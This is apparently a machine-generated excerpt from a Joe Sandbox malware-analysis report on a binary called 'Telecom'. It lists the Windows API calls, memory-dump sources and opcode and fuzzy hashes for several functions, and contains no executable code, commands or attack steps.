                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide
                                                      • String ID:
                                                      • API String ID: 626452242-0
                                                      • Opcode ID: ee88fe5f9b043068ba94d9fdd9940e39baba0ac80526476c12966770117a7bea
                                                      • Instruction ID: 13c30685faf4f8360a9f5b2a722f62f4f4a4bebb607fff7f7578127b32e20ef9
                                                      • Opcode Fuzzy Hash: ee88fe5f9b043068ba94d9fdd9940e39baba0ac80526476c12966770117a7bea
                                                      • Instruction Fuzzy Hash: 4D01ADB2A151007FAB1C7BAADC0BC7F7AAECB8A354700023FB502C7151E9A4AC018679
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00443BC9,?,00008000), ref: 00446FD0
                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00443BC9,?,00008000), ref: 004859E0
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: afe64834058244d2baf7732016c4a05bf5987639249a62402c7b1abf33a7a028
                                                      • Instruction ID: d62822bd0932c35e8d9a68cdedbab34aaeebb66b072d1f19fefac06604383474
                                                      • Opcode Fuzzy Hash: afe64834058244d2baf7732016c4a05bf5987639249a62402c7b1abf33a7a028
                                                      • Instruction Fuzzy Hash: D3019230241231B6E3301A26DC0EF9B7F98EF027B4F118312FEA96A1E0C7B85854CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • IsThemeActive.UXTHEME ref: 0044333D
                                                        • Part of subcall function 004432E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 004432FB
                                                        • Part of subcall function 004432E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00443312
                                                        • Part of subcall function 0044338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00443368,?), ref: 004433BB
                                                        • Part of subcall function 0044338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00443368,?), ref: 004433CE
                                                        • Part of subcall function 0044338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00512418,00512400,?,?,?,?,?,?,00443368,?), ref: 0044343A
                                                        • Part of subcall function 0044338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00512418,?,?,?,?,?,?,?,00443368,?), ref: 004434BB
                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00443377
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                      • String ID:
                                                      • API String ID: 1550534281-0
                                                      • Opcode ID: 7ee953c3f54a3c7b68df0d4d686441bf8e51ccc47e10a1309646165cf4354bc4
                                                      • Instruction ID: f7b76d46eb4606f0f89e7559a9928b54972fc650a2b60afcc084768196658f6e
                                                      • Opcode Fuzzy Hash: 7ee953c3f54a3c7b68df0d4d686441bf8e51ccc47e10a1309646165cf4354bc4
                                                      • Instruction Fuzzy Hash: FDF05431554744AFF7006F60EC0BBA47794A714B0FF008C1FB914851E2DBBD4169AB49
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: SleepTimetime
                                                      • String ID:
                                                      • API String ID: 346578373-0
                                                      • Opcode ID: 8e6f9ae1fbf644cd08381cf0d62c0164fef049af1452dc4b263eda6a0e488019
                                                      • Instruction ID: 86e220d8dcec77ebe749c1357ad0e2a5a25acf5fa4abe031ede1fcfbc4f0606a
                                                      • Opcode Fuzzy Hash: 8e6f9ae1fbf644cd08381cf0d62c0164fef049af1452dc4b263eda6a0e488019
                                                      • Instruction Fuzzy Hash: 56F05E71200605AFD354AF7AD455B56BBE9BB44751F04403AE819C7261DB64A804CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,0044AF3F,?,?,?), ref: 004487E7
                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,0044AF3F,?,?,?), ref: 0044881D
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide
                                                      • String ID:
                                                      • API String ID: 626452242-0
                                                      • Opcode ID: 427f1b69ac67d3724a4f534fa560e0106985f81ae660c1f55aec5cff0a6a4089
                                                      • Instruction ID: a7b3b6f401bd331878d4f0182a004cb2f1f1f827761b420b1c2b9079cd3ea7c1
                                                      • Opcode Fuzzy Hash: 427f1b69ac67d3724a4f534fa560e0106985f81ae660c1f55aec5cff0a6a4089
                                                      • Instruction Fuzzy Hash: DB01F2713011007FFB18AB6A9C0BF7F7AADCB89740F10403FB102DA1E0EEA19C008229
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 0044CEEE
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID:
                                                      • API String ID: 1385522511-0
                                                      • Opcode ID: 190f44faffa3e9f25b49560f42e85b1bf689ac9bc34fdc2ed8026d49370dd1e7
                                                      • Instruction ID: 1caa1443219097a215db6d92e9c481af15d1d0d9531abd959e7e09ac17a54ef2
                                                      • Opcode Fuzzy Hash: 190f44faffa3e9f25b49560f42e85b1bf689ac9bc34fdc2ed8026d49370dd1e7
                                                      • Instruction Fuzzy Hash: FA32B074A00206AFEF10CF55C8D4ABABBB5FF44314F19806BE916AB361C738AD45CB59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3fb18c085d84437bbe338b79beead23c6aa615beb180225a937fddbc45fb31ff
                                                      • Instruction ID: 5863bf3738c23a2c15c3eb59710fdb622e75783d61d70cc1798fea286fbc1c21
                                                      • Opcode Fuzzy Hash: 3fb18c085d84437bbe338b79beead23c6aa615beb180225a937fddbc45fb31ff
                                                      • Instruction Fuzzy Hash: FCE1B1719001199BEF14DF98C880AFEB7B5FF44304F54852BE812AB291E73DDA41CB9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: LoadString
                                                      • String ID:
                                                      • API String ID: 2948472770-0
                                                      • Opcode ID: 04e6c3134d654299abfbe7d764c6c3465011868f1973786c9d57abf2feae151f
                                                      • Instruction ID: 224140e2c2ddcbf7441545c9c4d7c36a058bcb23f3f717e241090771bed609b1
                                                      • Opcode Fuzzy Hash: 04e6c3134d654299abfbe7d764c6c3465011868f1973786c9d57abf2feae151f
                                                      • Instruction Fuzzy Hash: 27D16934A042099FDB14EF95C481EAEBBB5FF48314F14405EE915AB391EB34AD42CF98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 870d250f3cfffd20416cb779981bfa928637d0ae1d7e4faba1473e73765f13c2
                                                      • Instruction ID: 21b22bf4f4b1177412829b03827d7a75d0b994df3d7fbfdce4beb92fdcb42a42
                                                      • Opcode Fuzzy Hash: 870d250f3cfffd20416cb779981bfa928637d0ae1d7e4faba1473e73765f13c2
                                                      • Instruction Fuzzy Hash: AD518E35A00104AFCB00CF59E850BAA3BA1EF85364F05C1AAE8989B341E736ED46CF56
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?), ref: 004AFCCE
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: BuffCharLower
                                                      • String ID:
                                                      • API String ID: 2358735015-0
                                                      • Opcode ID: 4842355868b8288e92bd6068d2f3fb6c666f61a4989f0f8457449e2426f863ba
                                                      • Instruction ID: d47457cfa82f95ff9ef3427bb08e1665044e9f0495ebda4e312d8cfd47a177c8
                                                      • Opcode Fuzzy Hash: 4842355868b8288e92bd6068d2f3fb6c666f61a4989f0f8457449e2426f863ba
                                                      • Instruction Fuzzy Hash: 4D41C3B2900209AFDB119FA9C8809AFB7B9EF55314B10453FE51397291EB74DA098B54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0044663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0044668B,?,?,004462FA,?,00000001,?,?,00000000), ref: 0044664A
                                                        • Part of subcall function 0044663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0044665C
                                                        • Part of subcall function 0044663E: FreeLibrary.KERNEL32(00000000,?,?,0044668B,?,?,004462FA,?,00000001,?,?,00000000), ref: 0044666E
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,004462FA,?,00000001,?,?,00000000), ref: 004466AB
                                                        • Part of subcall function 00446607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00485657,?,?,004462FA,?,00000001,?,?,00000000), ref: 00446610
                                                        • Part of subcall function 00446607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00446622
                                                        • Part of subcall function 00446607: FreeLibrary.KERNEL32(00000000,?,?,00485657,?,?,004462FA,?,00000001,?,?,00000000), ref: 00446635
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Library$Load$AddressFreeProc
                                                      • String ID:
                                                      • API String ID: 2632591731-0
                                                      • Opcode ID: d5fd80a2b9986333cfd8915da0ea70bbb8224790ea60a344bf0649ce4d0ab030
                                                      • Instruction ID: 2a70e999a2e3849817ab3b738b12500c5dadc1d04ae2cfa1f4278268ea5894d3
                                                      • Opcode Fuzzy Hash: d5fd80a2b9986333cfd8915da0ea70bbb8224790ea60a344bf0649ce4d0ab030
                                                      • Instruction Fuzzy Hash: 14113A71600205ABEF14BF22CC02BAD7BA19F51708F12482FF442A61C2EE7DDA05DB5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: __wsopen_s
                                                      • String ID:
                                                      • API String ID: 3347428461-0
                                                      • Opcode ID: 1741948043b499cdd8e68a71cba724bc25a7c08b48b63007a52f893120cdfe5c
                                                      • Instruction ID: ed4961cbb706d603f16f81117d478fa15e553368018b7c01345d173dc433bb8c
                                                      • Opcode Fuzzy Hash: 1741948043b499cdd8e68a71cba724bc25a7c08b48b63007a52f893120cdfe5c
                                                      • Instruction Fuzzy Hash: 7D115A7690410AAFCF15DF58E9449DF7BF4EF48304F1180AAF809AB311DA31EA11CBA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ReadFile.KERNEL32(?,?,00010000,00000000,00000000,?,?,00000000,?,00446CC0,?,00010000,00000000,00000000,00000000,00000000), ref: 0044B17C
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: e3a2f0f82f6e652c3bd20ea8fd1064614011aa6f0c29096d9bc564034664f9f7
                                                      • Instruction ID: 0cb2eab8b9efedc2fec4c928443b13dd47b4359e6cde9f9d66fcc8f2abbfd3f1
                                                      • Opcode Fuzzy Hash: e3a2f0f82f6e652c3bd20ea8fd1064614011aa6f0c29096d9bc564034664f9f7
                                                      • Instruction Fuzzy Hash: FB115E312007059FE720CF15C890B67B7E9EF45794F10C42EE8AA8A651C774F845CBA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00474FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0047319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00475031
                                                      • _free.LIBCMT ref: 004753DF
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap_free
                                                      • String ID:
                                                      • API String ID: 614378929-0
                                                      • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                      • Instruction ID: 8b553b94fc972ffccbdb7a9746f89fc7f334f77e3385e8785fceddcd133d4b07
                                                      • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                      • Instruction Fuzzy Hash: F0014E721003446BE3358F55D84199AFBEDEB85370F25461EE58887280EBB46805C778
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                      • Instruction ID: 26e2939c49e94af37121adaf084ecf388fa9cc2d50babf93285d9632088b7ea7
                                                      • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                      • Instruction Fuzzy Hash: 2FF0F9B6500A1056D6313A279C0579B33D88F42338F14471FF529972D1FABCE80686DF
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0047319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00475031
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 15c5cd3182ddc93f5f55d9b19a2e60feb7c8a434d4a9bc09331494de5fc7b0f7
                                                      • Instruction ID: 111f513173ac9dd7667dc31993ce809d73c7a1ff8b440912b2e38698930be3a4
                                                      • Opcode Fuzzy Hash: 15c5cd3182ddc93f5f55d9b19a2e60feb7c8a434d4a9bc09331494de5fc7b0f7
                                                      • Instruction Fuzzy Hash: 2CF0B432551E60A69B312A66DD01ADB3748AF417A0F14C027B81CDF290EAACD80146EA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,00466A79,?,0000015D,?,?,?,?,004685B0,000000FF,00000000,?,?), ref: 00473BC5
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: d17a882a94d91fe44e39c77fb5c6c63b6157c807e5623644ab3ee75ed79f73c6
                                                      • Instruction ID: 6aca9b69b088ac22dba8f755624a5ab024f95d9ba1e4144cef6948996bfc03be
                                                      • Opcode Fuzzy Hash: d17a882a94d91fe44e39c77fb5c6c63b6157c807e5623644ab3ee75ed79f73c6
                                                      • Instruction Fuzzy Hash: CAE0E521250620A6DB303E739C01BDB36489F413A2F148167EC4C96292DB2CFE41A5AE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f7a030ceaca06761df1c20b17b597b9940e00b249b98cf6f2f48e6ee3ddc0cc3
                                                      • Instruction ID: 5584e8fb883192b3206c55041b9cba348302cb629f766a5b6347583c0e109103
                                                      • Opcode Fuzzy Hash: f7a030ceaca06761df1c20b17b597b9940e00b249b98cf6f2f48e6ee3ddc0cc3
                                                      • Instruction Fuzzy Hash: 4BF0A9B0101702CFDB389FA0D8A081BBBE4BF013293218D3FE1DA82610C7399880CF1A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
